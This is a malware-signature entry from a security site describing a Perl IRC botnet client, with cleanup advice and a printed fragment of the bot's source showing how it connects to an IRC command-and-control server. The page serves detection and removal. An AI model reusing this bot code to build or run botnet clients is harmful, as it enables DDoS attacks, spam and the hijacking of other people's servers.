Malware Signatures

  1. Home
  2. Malware Signatures
  3. pl.hacktool.ircbot.004

pl.hacktool.ircbot.004

Hacktools are specially crafted tools to perform malicious or illicit activities, such as controlling botnets, mining bitcoins, triggering Denial-of-Service attacks and bruteforcing passwords. Those tools most of the time hidden in the filesystem and were installed among with other malicious code throug a vulnerability or an already compromised server.
This perl script is a IRC bot, it connects to a IRC server and accept commands from the Command & Control server. This kind of malware is what turn the computers into zombies, the botnet clients, sending spam, DDoS attacks and acting as a proxy for their owners to attack other servers.

Affecting

Any vulnerable website with perl support. Outdated software or compromised passwords can act as an infection vector.

Cleanup

Inspect your server looking for any unknown perl file and remove them. Also, you can sign up with us and let our team remove the malware for you.

Dump


our %irc_servers;
our %DCC;
my $dcc_sel = new IO::Select->new();
$sel_cliente = IO::Select->new();
sub sendraw {
if ($#_ == '1') {
my $socket = $_[0];
print $socket "$_[1]n";
} else {
print $IRC_cur_socket "$_[0]n";
}
}

sub conectar {
my $meunick = $_[0];
my $servidor_con = $_[1];
my $porta_con = $_[2];
my $IRC_socket = IO::Socket::INET->new(Proto=>"tcp", PeerAddr=>"$servidor_con",
PeerPort=>$porta_con) or return(1);
if (defined($IRC_socket)) {
$IRC_cur_socket = $IRC_socket;
$IRC_socket->autoflush(1);
$sel_cliente->add($IRC_socket);
$irc_servers{$IRC_cur_socket}{'host'} = "$servidor_con";
$irc_servers{$IRC_cur_socket}{'porta'} = "$porta_con";
$irc_servers{$IRC_cur_socket}{'nick'} = $meunick;
$irc_servers{$IRC_cur_socket}{'meuip'} = $IRC_socket->sockhost;
nick("$meunick");
sendraw("USER $ircname ".$IRC_socket->sockhost." $servidor_con :$realname");
sleep 1;
}
}